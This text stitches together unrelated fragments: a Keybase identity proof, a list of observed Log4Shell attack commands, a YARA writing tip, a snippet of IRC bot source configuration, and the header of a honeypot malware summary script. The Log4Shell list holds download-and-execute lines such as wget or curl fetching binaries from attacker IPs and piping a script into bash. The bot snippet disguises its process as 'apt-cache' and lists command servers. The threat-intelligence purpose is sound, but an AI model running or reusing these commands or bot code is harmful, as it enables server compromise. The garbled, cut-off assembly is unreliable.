I hereby claim:
- I am zam89 on github.
- I am zam89 (https://keybase.io/zam89) on keybase.
- I have a public key whose fingerprint is 9BF2 4455 2715 6FBE 4E63 86AD 84E9 A972 EC9B 68FE
To claim this, I am signing this object:
Today's #Log4Shell activity observed:
- cd /usr/bin;wget http://155[.]94[.]154[.]170/bbb;curl -O http://155[.]94[.]154[.]170/bbb;chmod +x bbb;./bbb
- curl 152.67.63.150/king
- curl http://159[.]89[.]4[.]39/include/pyfpjn0.x86 -O /tmp/x86; chmod 777 /tmp/x86; ./tmp/x86 apache.exploit.x86
- curl http://2[.]56[.]59[.]123/1 --output 1; wget -O 1 http://2[.]56[.]59[.]123/1; chmod +x 1;./1
- curl http://83[.]97[.]20[.]171:6666
- curl -k https://41[.]157[.]42[.]239/bk.sh | bash
- echo 152[.]62[.]45[.]26:8443
- echo 168[.]159[.]209[.]96:8443
When creating your rules for YARA, keep in mind the following guidelines to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.
Global rules are evaluated first; non-global rules are evaluated only if the global rules are satisfied. This may be useful if all samples exhibit the same characteristics. Combine them with the "private" statement to suppress match notifications for the global rules.
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
# This list summarizes recent malware caught in my Kippo SSH Honeypot (http://code.google.com/p/kippo/)
#
# For detailed instructions, please see:
# https://blog.ls20.com/check-your-server-for-malware-from-ssh-brute-force-attacks/
#
# Last Updated: March 24, 2014
#
# Copyright (C) 2014 Lin Song
#
# This program is free software: you can redistribute it and/or modify it under